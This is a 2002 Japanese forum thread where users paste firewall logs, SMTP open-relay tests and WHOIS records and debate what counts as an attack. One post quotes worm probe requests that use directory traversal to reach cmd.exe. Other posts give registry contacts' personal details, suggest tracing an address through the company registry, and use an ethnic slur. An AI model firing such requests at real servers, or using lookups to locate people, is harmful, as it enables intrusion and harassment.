descr: InfoSphere (NTT PC Communications, Inc.)
country: JP
admin-c: HH1558JP
tech-c: RK448JP
tech-c: SO1352JP

>>466
それでもオマエは手段を書いてきただけマシだ。
467なんかよりよっぽどな。

sageでログ貼れや小僧！
ウザイんだよマジで

な〜にが、「解析スレ」だ。ログ貼りスレじゃねぇか。氏ね

むかついたから、age

>>467
いまVBのログみたらおれんとこもこの2時間のあいだに210.165.249.1の
N/AからPCのN/Aに執拗にクローキングされてる。
4回接続しなおしてその都度IP変わってんのに30回くらい連続で。
ｷｼｮｲな。

>>467
もしかしてOCN？

>>467、470
私のところにも今日InfoSphereからのが何度も・・・
誰かに狙われているのかと思ったが、他にもいたので安心、か？

The firewall has blocked Internet access to your computer
(ICMP Time Exceeded) from 210.165.249.98.

このスレ偶然発見！　おいらもですよ〜
Rule 'Other ICMP':Blocked: In ICMP [11] Time Exceeded,210.165.249.1->localhost
,Owner: Tcpip Kernel Driver

レンタルモデムだとICMPだけは通してしまう。何が行われているか心配・・

>>473
ついでにZoneAlarmのスレも見てくるとか。

>474　サンクス！
やっとわかった・・頻繁に起こるわけだ〜

あーなるほど。なんか背景が表示されないと思ったら。
でもなんで今日から急に。

漏れも連アタ食らったのでつなぎなおしてみた。

>>474
Thx！
これで安心して寝られる

みんな〜
肉を切らせて骨を断つって言葉知ってる？？
・
・
・
知らなさそうだね・・・

ログ「だけ」貼る厨警報sage

pingとtracertって不正アクセスになるのぉ？ﾀﾞｲｼﾞｮｳﾌﾞっしょ？

ハニーポットってマムコの事じゃないんだよ…

ネタが古くてだけど、今朝（09:55〜09:57）だったから。

台湾大手の一次プロバイダーの個人会員っぽい。
ここ確か、外国人でも会員になれるんだよな？
203.70.58.161
------------------------------------------------------------
no.262, 11f-9, ho nan rd., sec.2, taichung.
Netname: PHITECHCORPO-NET
Netblock: 203.70.58.160 - 203.70.58.167
Administrator contact:Seednet (RN472-TW) root123*seed.net.tw
------------------------------------------------------------

"GET /scripts/root.exe?/c+dir HTTP/1.0"
（中略）
"GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
↑
この最終行だけ、「蹴りました」ログがなかった。途中で止めたんだろか？
ファイルに変更、追加はなかったし、久しぶりにCRDetect.com使っちまったよ。

漏れのシステムにCODE REDが仕込まれてるか、を探ってるのか？
(ttp://www.jpcert.or.jp/at/2001/at010023.txt)
それともGREENか？　BLUEか？　NIMDAか？
(ttp://dog.intcul.tohoku.ac.jp/security/nimda/)

新種が出たのかと思って調べたけど、ないみたいだしなー。
漏れんとこ、IISなんて使ってないので止めてくれー。

198.32.200.17

このスレ汚染されてるな…

[email protected]
http://www.ordb.org/lookup/?host=mx1.1premio.com
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: mx1.1premio.com (65.121.18.77)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2002-06-03 16:09 CET
初回送信ホスト: 193.163.158.1
最終検査日時: 2002-06-03 16:09 CET
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin＠bockscar.ordb.org
Received: from qvp0017.freeyankeedom.com (unknown [65.121.18.11])
by BocksCar.ORDB.org (Postfix) with ESMTP id C9DC7584C
for ; Mon, 3 Jun 2002 16:09:22 +0200 (CEST)
Received: from localhost.localdomain (62.242.234.108 [62.242.234.108])
by qvp0017.freeyankeedom.com [169.254.2.54]
with ESMTP (Dimac Mail Server 1.0.1.0 XP)
id FCFF25C46BE14FF2BA90B0F8B19E371D
at Mon, 3 Jun 2002 08:03:00 -0600
(envelope-from [email protected] )
for marvin＠marvin.ordb.org
From: [email protected]
To: marvin＠marvin.ordb.org
X-ORDB-Envelope-From: [email protected]
X-ORDB-Envelope-To: marvin＠marvin.ordb.org
Subject: ORDB.org check (0.3904331943305340.0517962571) ip=65.121.18.77
Message-Id: <20020603140922.C9DC7584C＠BocksCar.ORDB.org>
Date: Mon, 3 Jun 2002 16:09:22 +0200 (CEST)

http://www.ordb.org/lookup/?host=email.qves.com
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: email.qves.com (65.121.18.51)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2002-05-21 19:33 CET
初回送信ホスト: 24.68.215.101
最終検査日時: 2002-05-24 00:04 CET
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin＠groundzero.ordb.org
Received: from qvp0017.freeyankeedom.com (unknown [65.121.18.11])
by groundzero.ordb.org (Postfix) with ESMTP id 66B745B10F
for ; Fri, 24 May 2002 00:02:44 +0200 (CEST)
Received: from groundzero.ordb.org (62.242.0.190 [62.242.0.190])
by qvp0017.freeyankeedom.com [169.254.2.54]
with ESMTP (Dimac Mail Server 1.0.1.0 XP)
id 24DEB3EBF2A445089FC5A08AE96D813B
at Thu, 23 May 2002 15:56:36 -0600
(envelope-from [email protected] )
for marvin＠marvin.ordb.org
From: [email protected]
To: marvin＠marvin.ordb.org
X-ORDB-Envelope-From: [email protected]
X-ORDB-Envelope-To: [email protected]
Subject: ORDB.org check (0.7115356861751390.4228052941) ip=65.121.18.51
Message-Id: <20020523220244.66B745B10F＠groundzero.ordb.org>
Date: Fri, 24 May 2002 00:02:44 +0200 (CEST)

日付: 2002/06/04 時刻: 23:49:52
○○○○,printer をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ○○○○,printer
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 61.58.217.120,orasrv　←これなんですか？

>>488
orasrv 1525/tcp # oracle or Prospero Directory Service non-priv
orasrv 1525/udp # oracle
かな？

169.254.6.87,ms-sql-s をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 169.254.6.87,ms-sql-s
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 198.85.192.134,2102
ﾌﾟﾛｾｽ名は N/A
まだ感染しているのか？？？？？

169.254.6.87,ftp をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 169.254.6.87,ftp
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.119.247.108,2342
ﾌﾟﾛｾｽ名は N/A

209.63.151.252,smtp をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ,smtp
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 142.177.140.16,3059
ﾌﾟﾛｾｽ名は N/A

,ftp をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ,ftp
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 193.180.172.48,2890
ﾌﾟﾛｾｽ名は N/A

61.121.100.24
ニフティかよ……

202.247.55.36
20
1560
SYN Flooding

よーし、お父さんもがんばって埋めるぞー！

consumerpackage.net
Relay test 6
>>> RSET
<<< 250 flushed
>>> MAIL FROM:< [email protected] >
<<< 250 ok
>>> RCPT TO:< relaytest%[email protected] >
<<< 250 ok

sage で貼れや。基地害ドモ

意味無いログだけ貼ってもウザイだけなんだよ。アフォが

第三者中継可能
smtp.net-keeper.com
<220 smtp.net-keeper.net ESMTP Sendmail 8.11.2/Oh-2001-01-01
>HELO rlytest.nanet.co.jp
<250 smtp.net-keeper.net Hello ns.nanet.co.jp [210.164.52.3], pleased to meet you
>MAIL FROM:< http://www.nanet.co.jp/rlytest/ requested [email protected] >
<250 2.1.0 < http://www.nanet.co.jp/rlytest/ requested [email protected] >... Sender ok
>RCPT TO:<[email protected]>
<250 2.1.5 <[email protected]>... Recipient ok
>QUIT
<221 2.0.0 smtp.net-keeper.net closing connection
問題あり：不正な中継を受け付けます。
(210.157.11.225)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

64.32.34.220,ms-sql-s をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 64.32.34.220,ms-sql-s
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.198.112.9,3361
ﾌﾟﾛｾｽ名は N/A

>>497
禿しく害出。
5/20(頃だっけ？)当たりからを念入りに読め

種類 時刻 受信/送信 ﾌﾟﾛﾄｺﾙ 送信元IPｱﾄﾞﾚｽ 送信元ﾎﾟｰﾄ
ﾌｧｲｱｳｫｰﾙ 3:02:44 受信 ICMP 192.168.1.254 N/A
ﾌｧｲｱｳｫｰﾙ 3:02:44 受信 ICMP 192.168.1.254 N/A
ﾌｧｲｱｳｫｰﾙ 3:03:09 受信 ICMP 192.168.1.254 N/A

ｍｓｎメッセを起動するといつもこいつから不正アクセスを受ける・・・
種類はトレースルートですすすす

>>499
捻りが足りない。

>>496 >>417

>>497 >>417

>>499 >>417

速く埋めようぜ。こんな意味無い糞スレ

>>505
言いたいことは分かるが、無くなると他に飛び火する。
隔離スレ、必要悪と思ってカウパー。

なんでトレースルートを不正アクセスだと思い込んでる奴がこんなにいるの？

上っ面ばかりみて本質を理解してない奴ばかりだから

>>508-509
これこれ、このスレを埋めて頂ける方々にそんな罰あたりを申すでない。

社会性のない便利屋さん(笑)が息巻いてる
スレって、ここですか？

最近よく、意味不明なアドレスから本文のないメールが僕の携帯に届きます。
本文はなく、件名は英語です。

最初はよくあることだと思って、一応受信拒否にしていましたが、
そのうちプロバイダにもらった自分のメールアドレスや、
現在使っているもしくは、昔使っていたホットメールのアドレスから送られてくるようになったんです。

やっぱヤバいですか？

関係ありそうなこと書いときます。

■Vectorでiアプリを探して（PC）、サイトの送信フォームから自分の携帯のアドレスを入力し、送信した。

■プロバイダからもらったアドレスから送られてきたとき、「氏ね」と返信して、家に帰って見てみたら「Re: A powrful game」「氏ね」とメールが届いていた。

■以前W31.klez.H@mmに感染したことがある。

■プロバイダからもらったアドレスの送信済みアイテムを見てみると、↑に感染したファイルが出てきた。


・・・お願いします。

>>512
言っとることがよくわからん。
１．ウィルスに感染した時の対処は？
　感染したならＯＳの再インストをお勧め。
　駆除ソフトは警告とおもうとよい。
２．ストーカー？

>そのうちプロバイダにもらった自分のメールアドレスや、
>現在使っているもしくは、昔使っていたホットメールのアドレスから送られてくるようになったんです。
俺、日本語弱いんだけどさ、この文を読むと自分のアドレスから送られてきてるの？
だったらすべてのパスワードの変更を。
こういう場合犯人は以外に身近な人かもね。
もしくはトロイでもはいってんじゃないの？君のパソコン。

しろーと相手のなりすましメールに、
パスワードなど関係ないぼ。

>そのうちプロバイダにもらった自分のメールアドレスや、
>現在使っているもしくは、昔使っていたホットメールのアドレスから送られてくるようになったんです。

これって差出人のことか？
差出人の偽装なんて素人でも出来るぞ
メーラのセットアップのときに他人のアドレス入れてみろよ

コメントせよ→第三者中継狩野
あんた詳しいんだろ？

>>516
あんったて誰よ？

>>517
あんったて何よ？

ウイルバスターのログ見ると俺攻撃されまくってるよ。
俺が有名人ってどうしてわかるんだ？

>>519
クローキングくらいで言うなよ。

>520
・・・あんたクローキングって意味分かっていってんの？
俺はバスクーの説明読んでも意味分からんけどな。

アドレス：61.73.12.19
時刻：15:51
手口：トロイの木馬

person: Won Kang
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: WK81-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC

あほキター！

person: Dongjoo Lee
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: DL276-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC

person: Won Kang
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: WK81-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC

person: GilSoon Park
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: GP20-KR
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20020603
source: KRNIC

なんか３人出たんだけどどいつですか？

あぼーん

>>522-524
sage で貼れや。激しく板汚し

>>417

回線切って、（略

>>417

どうせ、次のレスも >>417 だと思われ。

>>521
色んな所でクローキングされて騒ぐ馬鹿がいるから言ってるんだろ。
何を勘違いしてるんだ？

＞俺はバスクーの説明読んでも意味分からんけどな。

バスクリンの説明書か、そりゃ載ってないや（ｗ



スレ埋め立てのため、あえてネタだろうがマジレス

ﾈﾀwhoisuzee

>>526
へへっ、ようやくバカが釣れた

ここからよくアクセス受けるんだけど・・・

inetnum: 218.11.0.0 - 218.12.255.255
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: ZC24-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-HE
changed: [email protected] 20010523
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

person: zhiyong chen
address: hebei province shijiazhuang
address: fanxi road No.19
address: hebei shuju tongxin ju
country: CN
phone: +86-311-6051394
fax-no: +86-311-6672895
e-mail: [email protected]
nic-hdl: ZC24-AP
mnt-by: MAINT-CHINANET-HE
changed: [email protected] 20010212
source: APNIC

台湾人って暇だな・・・

↑
あっ　中国人か

>>529

>>417

10.144.0.1
BOOTP File Overflow

多い時で、日に７〜８回。少なくても１回は来てる。
いったい何者？

接続: localhost: Backdoor-g-1(1243) から localhost: 1027, 227 ﾊﾞｲﾄを送信, 479 ﾊﾞｲﾄを受信, 0.359 経過
ﾘﾀﾞｲﾚｸﾄした接続: localhost: 1027 に localhost: Backdoor-g-1(1243), 363 ﾊﾞｲﾄを送信, 227 ﾊﾞｲﾄを受信, 0.359 経過

↑ってゆーログがNISのログ(接続)にあるんすけど。
。。。。やっぱトロイに感染してデバガメされてんスよねぇ

202.248.63.186,ms-sql-s をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 202.248.63.186,ms-sql-s
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.234.117.160,2227
ﾌﾟﾛｾｽ名は N/A

202.233.246.233,ms-sql-s をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 202.233.246.233,ms-sql-s
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 4.35.51.88,1262
ﾌﾟﾛｾｽ名は N/A

>>533-534 ハイハイ。板汚しだから、sage で貼ってね。

>>417

レポート元 WPNP
Sunday, June 09, 2002 07:17:50

ユーザ名 : pjocpuorgytic9c5acf3d1a2b
ｱｸｾｽﾚﾍﾞﾙ : user
ｵﾝﾗｲﾝ時間 : 7:53:20
入室ﾁｬﾝﾈﾙ :
状態 : 0 in queue (0 of 1 available)
共有ﾌｧｲﾙ数 : 300
現在のﾀﾞｳﾝﾛｰﾄﾞ : 0
現在のｱｯﾌﾟﾛｰﾄﾞ: 0
接続種類 : 不明
ｸﾗｲｱﾝﾄﾊﾞｰｼﾞｮﾝ : WinMX v2.6j

典型的持ち逃げ野郎です

>>536





そ　れ　の　ど　こ　が　不　正　ア　ク　セ　ス　な　の　か　と　、　（　以　下　略

>>535
ゴメンヨ。知識浅いもんでどの板に書いてよいかわかりませぬ(鬱)
どこで聞いたらよいか教えていただける？
お願い！

>>533 >>538
localhostというのは自分のPC自身を指しているので、
533にあるログは外部との通信ではなく、自分のPC
内部での通信を示している。それと、たまたま1243の
ポートを使ったのでBackdoor-g-1と表示されただけと
思われる。したがって、このようなログがあったからと
いってトロイに感染しているわけではない。

>>538 MX厨はダウソ板逝けや

チャンコロがうぜぇ！
種類 時刻 受信/送信 ﾌﾟﾛﾄｺﾙ 送信元IPｱﾄﾞﾚｽ 送信元ﾎﾟｰﾄ 送信先ﾎﾟｰﾄ 説明
ﾌｧｲｱｳｫｰﾙ 14:29:52 受信 ICMP 202.102.144.189 N/A N/A Smurf
ﾌｧｲｱｳｫｰﾙ 14:29:52 受信 ICMP 202.102.144.189 N/A N/A Smurf
ﾌｧｲｱｳｫｰﾙ 14:29:52 受信 ICMP 202.102.144.189 N/A N/A Smurf
ｸﾛｰｷﾝｸﾞ 12:58:07 受信 ICMP 202.102.144.189 N/A N/A Cloaking
ｸﾛｰｷﾝｸﾞ 12:58:19 受信 ICMP 202.102.144.189 N/A N/A Cloaking
ｸﾛｰｷﾝｸﾞ 13:01:19 受信 ICMP 202.102.144.189 N/A N/A Cloaking
ｸﾛｰｷﾝｸﾞ 13:01:21 受信 ICMP 202.102.144.189 N/A N/A Cloaking
ｸﾛｰｷﾝｸﾞ 13:04:30 受信 ICMP 202.102.144.189 N/A N/A Cloaking
ｸﾛｰｷﾝｸﾞ 13:04:30 受信 ICMP 202.102.144.189 N/A N/A Cloaking
ｸﾛｰｷﾝｸﾞ 13:05:27 受信 ICMP 202.102.144.189 N/A N/A Cloaking
ｸﾛｰｷﾝｸﾞ 13:05:27 受信 ICMP 202.102.144.189 N/A N/A Cloaking
ｸﾛｰｷﾝｸﾞ 13:05:27 受信 ICMP 202.102.144.189 N/A N/A Cloaking
ｸﾛｰｷﾝｸﾞ 13:05:28 受信 ICMP 202.102.144.189 N/A N/A Cloaking
ｸﾛｰｷﾝｸﾞ 13:05:28 受信 ICMP 202.102.144.189 N/A N/A Cloaking

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 202.102.128.0 - 202.102.191.255
netname: CHINANET-SD
descr: CHINANET Shandong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: XZ14-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-ZXF
changed: [email protected] 20000101
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

person: XIAOFENG ZHANG
address: Shandong Public Information Service Bureau
address: No.77 Jingsan Road,Jinan,Shandong P.R China
country: CN
phone: +86-531-6052163
fax-no: +86-531-6052414
e-mail: [email protected]
nic-hdl: XZ14-AP
mnt-by: MAINT-ZXF
changed: [email protected] 20001012
source: APNIC

アイ・ディフェンス・ジャパンからの情報によると、
中国と韓国の学生ハッカーたちが日本のウェブサイトと
ネットワークを対象にした攻撃を2002年7月以降活発化させる
計画であるとのこと。これを発表したのはブラジルのハッカー
Demonadios.br のメンバー。彼は、
小泉首相の靖国参拝に抗議して2001年8月20日に行われた
日本のウェブサイトに対するクラック攻撃に関与しているという

http://headlines.yahoo.co.jp/hl?a=20020607-00000018-vgb-sci

Norton Internet Security から警告が出ました。
何ヶ月か前のキャプチャー画像を見ながら入力します。

------------------------------------------------------------
ﾘﾓｰﾄｼｽﾃﾑ がこの ｺﾝﾋﾟｭｰﾀ に ｱｸｾｽ しようとしています
脅威レベル 高危険度

15:10(02/04/28)に次の通信を検出しました:
ﾌﾟﾛﾄｺﾙ:UDP(ｲﾝﾊﾞｳﾝﾄﾞ)
ﾘﾓｰﾄｱﾄﾞﾚｽ:0.0.0.0:bootpc(68)
ﾛｰｶﾙｱﾄﾞﾚｽ:255.255.255.255:bootpc(67)
ﾘﾓｰﾄｺﾝﾋﾟｭｰﾀ がこの ｺﾝﾋﾟｭｰﾀ 上の ｻｰﾋﾞｽ と通信しようとしてい
------------------------------------------------------------

これって危険なんですよね？
遮断しましたが・・・一体何なのでしょう。
分かる人がいましたら教えて下さい。

マカフィーのファイアウォール使ってるけど、
さっきから61.194.36.34ってやつがしつこい。
しかも東京からだよ。
今Iria使ってるけどそのせいかなぁ？

さっきノートンセキュリティがトロイの木馬による不正アクセスの攻撃を
くいとめてくれました。ところで、トロイの木馬とは何でしょうか？
わけがわかりません。

最悪の板汚しスレだな。ここ

　　　　　　　　　　　　　　　　　 　 　　,／⌒ヾ　ｸﾞｲｸﾞｲ
　　　　　　　　　　　　　　　　 　 　 ,／　　　　ヽ
　　　　　　　　　　　 ∧＿∧　　,／　　　　　　　ヽ
　　　　　　　　　　　（　´∀｀）,／　 　　　　　　　　 ヽ
　　　　　　　　　　　（　　つつ@　 　　　　 　　　　　　ヽ
　　　 　 　 ＿＿　 ｜ ｜　|　　　 　　　　 　　　　　　　 ヽ
　　　　　　|――|　（_＿）＿）　　　　 　　 　　　　　　　　　ヽ
￣￣￣￣￣￣￣￣￣￣￣￣|　　　　　　　　 　　　　 　　　ヽ
／⌒＼／⌒＼／⌒＼／⌒＼|彡~ﾟ　゜~ ~。゜　~ ~　~ ~~　~ ~~　~ ~~　~~　~~
⌒＼／⌒＼／⌒＼／⌒＼／⌒＼彡　〜　〜〜　〜〜　〜〜　〜　〜

トロイの木馬とは、ウイルスの名前でし。ファイルの破壊とか
する悪性のウイルスでし。

>>548
トロイの木馬＝不正アクセス目的。感染・拡散機能なし。
ウイルス＝イタズラ目的。感染・拡散機能あり。
両者混合のものもある。

>>543
どーいう環境にあるか知らんが･･･
http://www.zdnet.co.jp/help/howto/win/win2000/0007special/dns/chap2/13.html

ここの板も高危険度みたいだいろいろな意味で･･･。

よさそうな板だったが今は腐ってるな　

とくに551がな

最近毎日のように、CloakingやTracerouteなどを受けているんですが、
ルーターからのCloakingはいいとして、それ以外の奴に困ってます。
ポート８０と５３をやられているのですが、塞ぐことは出来るのでしょうか？
あと、塞いでも問題ないでしょうか？
宜しくお願いします。

>>539
レス、ありがとー^ ^　他人からそういってもらえるとすごく安心しますよぅ。
今日TCP/IPの解説書とNISのガイドブック買ってきて今勉強してます。
。。。あんまし意味わかんないけれど(笑　ログの意味がわかるようにがんばるっす！

>>545
トロイの木馬は549さんがゆってる通り、不正アクセスをする為のプログラム。
不正アクセスっていうのはあなたのPCがトロイに感染してると他の人が
勝手にあなたのPCの中身を見たりファイルを盗んだりPCをいじられるのです。
「トロイの木馬」で検索すると各トロイの木馬が使用するポート番号とかの情報が
わかるから自分のPCのログと照らし合わせたりして確認するのがよい、らしいです。

わたしもまだ勉強チュウです。(汗)

>>540
WIN MXのこと言ってるの？winMXって1243使うんだ?ふーん。
でもわたし、WINMX使ってないんだけど。

inetnum: 24.0.0.0 - 24.255.255.255
netname: IANA-NETBLOCK-24
descr: This network range is not allocated to APNIC.
descr:
descr: If your whois search has returned this message, then you have
descr: searched the APNIC whois database for an address that is
descr: allocated by another Regional Internet Registry (RIR).
descr:
descr: Please search the other RIRs at whois.arin.net or whois.ripe.net
descr: for more information about that range.
country: AU
admin-c: IANA1-AP
tech-c: IANA1-AP
remarks: For general info on spam complaints email [email protected].
remarks: For general info on hacking & abuse complaints email [email protected].
mnt-by: MAINT-APNIC-AP
mnt-lower: MAINT-APNIC-AP
changed: [email protected] 20020530
source: APNIC

>>555
脱力・・・

>>555 sage で貼れ。アフォが

>>417

埋まるなら何でもいいよ。

「Default Block RASmin Trojan」
ｱｳﾄﾊﾞｳﾝﾄﾞ UDP ﾊﾟｹｯﾄ
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは localhost,1045
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは localhost,1045

↑これ何でしょうか。

>>559

>>417

>>550
レスありがとうございます。
やっぱり危険かも・・・

もぅいいい

>>554
その説明はトロイでなくバックドアと思われ。

即席で定義すると、

【バックドア】
侵入者が、後に容易に進入可能なように裏口を用意するもの。
【トロイの木馬】
　　繁殖に誰か(人間)の手が必要なもの。メールの添付ファイルとか。
【ウイルス】
　　繁殖に宿主が必要なもの。Wordのマクロとか。
【ワーム】
　　全く自力で繁殖可能なもの。これ最強。

最近はこれらをぜんぶひっくるめて【ウイルス】と呼んでしまうことが多い。
なおこれらはあくまで性質の定義なので、複数の性質を持つものもある。
象徴的なのがNimdaとか。

てな感じかなぁ。

http://www.trendmicro.co.jp/vinfo/virusencyclo/glossary.asp#virus_types

>>564
そこ、俺も示そうと思ったけど必ずしも正しい語源を表してないんだよね。
現状に即して意訳されているというか。

たとえば、

http://www.trendmicro.co.jp/vinfo/virusencyclo/glossary.asp#trojan
トロイの木馬型
基本的に、ほかのファイルやシステムに感染活動を行わず単体で動作する
不正プログラムのことをトロイの木馬と呼んでいます。 ワーム活動を行うもの、
ネットワークを介して被害者のマシンをリモートコントロールするサーバ＝クライアント型の
ハッキングツール、不正プログラム実行時にコンピュータを破壊するものなど、活動は
さまざまです。

よりか、

http://hq.mcafeeasap.com/trojans.asp
A Trojan Horse is a program that pretends to have a set of useful or desirable
features, but actually contains a damaging payload. Since it does not replicate,
a Trojan Horse is not technically a virus, but it may delete the contents of a hard drive!

のほうが、説明としては正しいし。
つーか「トロイの木馬」は「トロイの木馬」なのよ。

あ、

> 【トロイの木馬】
> 　　繁殖に誰か(人間)の手が必要なもの。メールの添付ファイルとか。

これは間違ってるね。「繁殖」じゃなくて「活動」するために人の手が必要なもの。
が正解。
今のご時世では繁殖が主な活動になってはいるけど。

解析ってIPドメインサーチしか知らないんだけど
もっと深く探るにはどうすりゃいいですか

あぼーん

-----------------------------------------------------------

751 ：不明なデバイスさん ：02/06/11 01:06 ID:7GUIyFYr

　　　 　　　　　　 ∧＿∧ ヒロｸｿはもうギブアップしたってよ（藁
　　　　　 　 　　 （　´_ ゝ`） ∧＿∧
　　　　　　　　　/　＼／ ）（　´,_ゝ`）ﾌﾟｯ
　　　　　　　　/　 ＼___／/　　　　　　 ＼
　 ＿＿　　　.| 　　　　|　/　/＼＿ ＿ ＼ ＼＿＿＿＿＿
　 ＼　 ￣￣￣￣￣￣（__ノ 　　＼　　　 ＼__）　　　　　　＼
　　||＼　　　　　　　　　　 　 ＼ 　.||＼　　　　　　　　　　　　＼
　　||＼||￣￣￣￣￣￣￣||￣　　||＼||￣￣￣￣￣￣￣||￣
　　||　 ||￣￣￣￣￣￣￣|| 　　　||　 ||￣￣￣￣￣￣￣||


　　　　　　
　　　　　　　　　　　↑この超馬鹿も解析した方がいいよな〜

http://ton.2ch.net/test/read.cgi/gline/1019935829/l50　
　こいつは↑ここを見た方がこいつの為になるのにねぇ〜

>>568

>>417

>>568

>>537

これだけで住所とかわかる？2CHのスーパーハッカーお願い！

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.203.0.0-61.203.127.0
b. [ネットワーク名] BIGLOBE-2
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [運用責任者] TN265JP
n. [技術連絡担当者] NK032JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/03/22
[返却年月日]
[最終更新] 2001/06/21 16:13:00 (JST)
[email protected]

>>572
f.に会社名が書いてあるだろ。そしたら法務局いって登記簿閲覧すれば住所まで分かるYO!

b.mx.offertoday.net (pri=0)
<220 mailer1.hi-speedoffers.com ESMTP
>HELO rlytest.nanet.co.jp
<250 mailer1.hi-speedoffers.com
>MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ [email protected] >
<250 ok
>RCPT TO:<[email protected]>
<553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
正常：中継は拒否されました。
----------------
a.mx.offertoday.net (pri=0)
<220 mailer.hispeedmailer.com SMTP daemon ready.
>HELO rlytest.nanet.co.jp
<250 mailer.hispeedmailer.com pleased to meet you, rlytest.nanet.co.jp
>MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ [email protected] >
<250 sender is < TEST http://www.nanet.co.jp/rlytest/ [email protected]>,
sender OK
>RCPT TO:<[email protected]>
<551 Sorry ns.nanet.co.jp(210.164.52.3), I don't allow unauthorized relaying.
Please use another SMTP host to mail from < TEST http://www.nanet.co.jp/rlytest/ [email protected] > to <[email protected]>
正常：中継は拒否されました。

最近メールサーバへのスキャン目立ちませんか？
そのサーバで有効なアドレスを差出人にしてrelayするかどうかのチェックをするもの。
以下ログですが、[email protected] が有効アドレスで、address.barのsmtpサーバの
ログです。ﾅｲｼｮなので他一般に修正してあります。
twあたりからは何度か来てたんですが、jpから来たのは初めてなので記念ｶｺｷ。

Jun ** **:**:** hostname sendmail[99999]: XXX99999: <[email protected]>... we do not relay
